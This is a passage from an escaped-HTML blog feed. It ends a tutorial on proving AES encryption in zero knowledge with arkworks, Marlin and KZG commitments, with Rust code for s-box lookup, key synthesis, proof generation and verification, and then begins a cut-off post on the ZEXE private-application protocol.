&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;result.enforce_equal(&amp;amp;zero)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;What happens with the substitution boxes? We could implement a gadget for the whole operation, but the number of constraints grows very quickly: each step involves more than ten XOR operations, which is expensive. In practice, the s-boxes are obtained from a lookup table, which has all 256 possible output values precomputed.&lt;&#x2F;p&gt;
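&lt;p&gt;To build intuition for the lookup gadget used below: selecting an entry from a table of size $2^n$ by an $n$-bit index can be done by halving the candidate range once per bit, from the most significant bit down. A plain-Rust sketch of that idea (the function name and shape are ours, not the arkworks API):&lt;&#x2F;p&gt;

```rust
// Select table[index] where index is given MSB-first as bits.
// Each bit halves the remaining range, mirroring how a
// power-of-two conditional-select gadget narrows its table.
fn select_by_bits(bits: [bool; 3], table: [u8; 8]) -> u8 {
    let mut lo = 0_usize;
    let mut len = table.len();
    for bit in bits {
        len /= 2;
        if bit {
            lo += len;
        }
    }
    table[lo]
}
```

&lt;p&gt;With bits $(1,0,1)$, i.e. index 5, the sketch returns the sixth table entry; the gadget version does the same selection with constraints instead of branches.&lt;&#x2F;p&gt;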
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn substitute_byte(byte: &amp;amp;UInt8Gadget, lookup_table: &amp;amp;[UInt8Gadget]) -&amp;gt; Result&amp;lt;UInt8Gadget&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Ok(UInt8Gadget::conditionally_select_power_of_two_vector(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;byte.to_bits_be()?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        lookup_table,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    )?)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn substitute_bytes(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    bytes: &amp;amp;[UInt8Gadget],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    lookup_table: &amp;amp;[UInt8Gadget],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Result&amp;lt;Vec&amp;lt;UInt8Gadget&amp;gt;&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ensure!(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        bytes.len() == 16,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;quot;Input must be 16 bytes length when substituting bytes&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut substituted_bytes = vec![];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for byte in bytes {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        substituted_bytes.push(substitute_byte(byte, lookup_table)?);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ensure!(substituted_bytes.len() == 16, &amp;quot;Error substituting bytes&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Ok(substituted_bytes)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;proof-generation&quot;&gt;Proof generation&lt;&#x2F;h2&gt;
&lt;p&gt;The first step to generating the proof is to obtain the proving and verification keys. These are derived from the structured reference string (SRS) obtained from a secure multiparty computation.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let (proving_key, verifying_key) = synthesize_keys(message_length)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Here is the definition of the synthesize keys function:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn synthesize_keys(plaintext_length: usize) -&amp;gt; Result&amp;lt;(ProvingKey, VerifyingKey)&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let rng = &amp;amp;mut simpleworks::marlin::generate_rand();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let universal_srs =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        simpleworks::marlin::generate_universal_srs(1_000_000, 250_000, 3_000_000, rng)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let constraint_system = ConstraintSystem::&amp;lt;ConstraintF&amp;gt;::new_ref();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let default_message_input = vec![0_u8; plaintext_length];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let default_secret_key_input = [0_u8; 16];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let default_ciphertext_input = vec![0_u8; plaintext_length];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut message_circuit: Vec&amp;lt;UInt8Gadget&amp;gt; = Vec::with_capacity(default_message_input.len());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for byte in default_message_input {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        message_circuit.push(UInt8Gadget::new_witness(constraint_system.clone(), || {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Ok(byte)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })?);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut secret_key_circuit: Vec&amp;lt;UInt8Gadget&amp;gt; =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Vec::with_capacity(default_secret_key_input.len());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for byte in default_secret_key_input {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        secret_key_circuit.push(UInt8Gadget::new_witness(constraint_system.clone(), || {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Ok(byte)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })?);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut ciphertext_circuit: Vec&amp;lt;UInt8Gadget&amp;gt; =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Vec::with_capacity(default_ciphertext_input.len());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for byte in default_ciphertext_input {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ciphertext_circuit.push(UInt8Gadget::new_input(constraint_system.clone(), || {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Ok(byte)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })?);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let _ciphertext = encrypt_and_generate_constraints(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;message_circuit,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;secret_key_circuit,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;ciphertext_circuit,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        constraint_system.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    simpleworks::marlin::generate_proving_and_verifying_keys(&amp;amp;universal_srs, constraint_system)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Since this is only a test, we generate the SRS from a function instead of reading it from the result of the multiparty computation.&lt;&#x2F;p&gt;
&lt;p&gt;We now define a function that contains all the steps to generate the proof:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn encrypt(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    message: &amp;amp;[u8],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    secret_key: &amp;amp;[u8; 16],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ciphertext: &amp;amp;[u8],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proving_key: ProvingKey,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Result&amp;lt;MarlinProof&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let rng = &amp;amp;mut simpleworks::marlin::generate_rand();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let constraint_system = ConstraintSystem::&amp;lt;ConstraintF&amp;gt;::new_ref();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut message_circuit: Vec&amp;lt;UInt8Gadget&amp;gt; = Vec::with_capacity(message.len());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for byte in message {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        message_circuit.push(UInt8Gadget::new_witness(constraint_system.clone(), || {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Ok(byte)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })?);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut secret_key_circuit: Vec&amp;lt;UInt8Gadget&amp;gt; = Vec::with_capacity(secret_key.len());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for byte in secret_key {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        secret_key_circuit.push(UInt8Gadget::new_witness(constraint_system.clone(), || {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Ok(byte)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })?);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut ciphertext_circuit: Vec&amp;lt;UInt8Gadget&amp;gt; = Vec::with_capacity(ciphertext.len());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for byte in ciphertext {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ciphertext_circuit.push(UInt8Gadget::new_input(constraint_system.clone(), || {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Ok(byte)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })?);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    encrypt_and_generate_constraints(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;message_circuit,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;secret_key_circuit,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;ciphertext_circuit,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        constraint_system.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    )?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We clone the constraint system because, deep down, generating the&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; proof consumes the constraint system, and it must hold exactly one&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; reference for it to be consumed.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let cs_clone = (*constraint_system&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .borrow()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .ok_or(&amp;quot;Error borrowing&amp;quot;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map_err(|e| anyhow!(&amp;quot;{}&amp;quot;, e))?)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    .clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let cs_ref_clone = ConstraintSystemRef::CS(Rc::new(RefCell::new(cs_clone)));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let proof = simpleworks::marlin::generate_proof(cs_ref_clone, proving_key, rng)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Ok(proof)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Finally, we run the following lines to get the proof:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let message = [1_u8; 16]; &#x2F;&#x2F; Example message&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let secret_key = [0_u8; 16]; &#x2F;&#x2F; Example key&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let proof = encrypt(&amp;amp;message, &amp;amp;secret_key, &amp;amp;primitive_ciphertext, proving_key)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;verification&quot;&gt;Verification&lt;&#x2F;h2&gt;
&lt;p&gt;To verify the proof, we first encapsulate all the steps in this function, which takes the verifying key, the proof, and the ciphertext:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn verify_encryption(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    verifying_key: VerifyingKey,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof: &amp;amp;MarlinProof,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ciphertext: &amp;amp;[u8],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Result&amp;lt;bool&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut ciphertext_as_field_array = vec![];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for byte in ciphertext {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let field_array = byte_to_field_array(*byte);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        for field_element in field_array {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            ciphertext_as_field_array.push(field_element);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    simpleworks::marlin::verify_proof(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        verifying_key,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;ciphertext_as_field_array,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        proof,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;mut simpleworks::marlin::generate_rand(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
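The helper `byte_to_field_array` is used above without being shown. A minimal stand-in, under the assumption that it decomposes each byte into its eight bits (least-significant first) lifted to field elements, could look like this, with `u64` as a placeholder for the actual `ConstraintF` type:

```rust
// Hypothetical stand-in for `byte_to_field_array`: split a byte into its
// eight bits, least-significant first, each lifted to a field element.
// `u64` is a placeholder for the real `ConstraintF` field type.
fn byte_to_field_array(byte: u8) -> Vec<u64> {
    (0..8).map(|i| u64::from((byte >> i) & 1)).collect()
}

// Flatten a ciphertext into the public-input vector, mirroring the loop
// inside `verify_encryption`.
fn ciphertext_to_public_inputs(ciphertext: &[u8]) -> Vec<u64> {
    ciphertext
        .iter()
        .flat_map(|byte| byte_to_field_array(*byte))
        .collect()
}
```

Each byte thus contributes eight public inputs, so the verifier sees exactly the same bit decomposition that the `UInt8Gadget` public inputs expose in the circuit.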
&lt;p&gt;Then, we run the verification and check the result:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let result = verify_encryption(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    verifying_key,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;proof,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;primitive_ciphertext&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;assert!(result);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;AES is the most widely used symmetric encryption algorithm. In this post, we addressed the problem of producing a cryptographic proof of the correct execution of the AES encryption function for a given plaintext-key pair. Using the Arkworks library, we implemented AES and obtained its representation as an R1CS. Afterward, using Marlin and the Kate-Zaverucha-Goldberg polynomial commitment scheme, we generated a cryptographic proof. The verifier, using the ciphertext as input, can verify the proof to assert the correct execution of the function.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Fully private applications: A ZEXE protocol</title>
          <pubDate>Thu, 05 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/fully-private-applications-a-zexe-protocol/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/fully-private-applications-a-zexe-protocol/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/fully-private-applications-a-zexe-protocol/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;One of the key issues in the current world is how to achieve consensus between trustless parties. Distributed ledgers have become popular since the advent of cryptocurrencies, built over a technology known as blockchain. One of the main problems is that these ledgers offer limited privacy and are quite constrained in the kind of programs they can run. Aleo provides a full-stack approach for writing private applications. One of its core components is the ZEXE protocol, the first ledger-based system in which applications can run privately and trustlessly while remaining easy to scale.&lt;&#x2F;p&gt;
&lt;p&gt;As we mentioned before, ledger-based systems can support rich applications, but often suffer from two main drawbacks:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Validating a transaction requires re-executing the state transition it refers to.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Transactions are not private; they reveal information about users and the state of the system.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
